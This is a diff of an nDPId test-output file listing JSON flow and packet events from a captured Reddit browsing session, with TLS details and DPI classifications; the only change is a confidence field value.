00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3009,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687975,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJEjS+XYgBAB+0YvAAABAQgKUckwIcLXQBU="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} 
-01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} 
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688324,"flow_last_seen":1605291688324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688324,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605291688324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688324,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjQAAAAAoAL9INe7AAACBAWgBAIICn8mSwwAAAAAAQMDBw=="} 
00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688336,"flow_last_seen":1605291688336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688336,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -228,33 +228,33 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605291688344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688344,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACgGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmAAAAAAoAL9ICpwAAACBAWgBAIICgi3lpgAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688365,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnC63k25KV6Y1oBJXgLbhAAACBAV4AQMDAwQCCArC10GYfyZLDA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688365,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjUut5NvgBAB+zrKAAABAQgKfyZLNcLXQZg="} 
-00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605291688370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688370,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnlMkjxA2CKc5oBJXgKoEAAACBAV4AQMDAwQCCArC10GjfyZLGA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605291688370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688370,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzlTJI8RgBAB+y30AAABAQgKfyZLOsLXQaM="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
